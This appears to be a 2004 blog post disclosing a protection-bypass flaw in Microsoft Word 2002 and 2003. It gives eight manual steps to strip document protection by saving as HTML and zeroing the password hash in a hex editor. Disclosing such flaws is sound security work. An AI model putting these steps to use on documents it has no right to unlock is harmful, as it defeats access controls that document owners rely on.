Wednesday, January 07, 2004

Protection bypass vulnerability in Ms-Word ...

Microsoft Word 2003 and 2002 contains a protection-bypass vulnerability. By performing a simple process outlined below, a user can unprotect a protected document without the use of a password cracker or other special tools. :(

This bug was discovered by Thorsten Delbrouck.

To see the bug for yourself follow the below demonstartion!!

1.) Open a protected document in Word.
2.) Choose the Save As Web Page (*.htm; *.html) option and close Word.
3.) Open the HTML document in any text editor.

4.) Search the <w:UnprotectPassword> tag for a line that looks like: <w:UnprotectPassword>ABCDEF01</w:UnprotectPassword>. Gather the password.

5.) Open the original .doc document with any hex editor.
6.) Search for hex values of the password (reverse order).
7.) Overwrite all four double-bytes with 0x00. Save, and close.

8.) Open the document in Word. Select Tools, Unprotect Document. Password is blank.


No comments: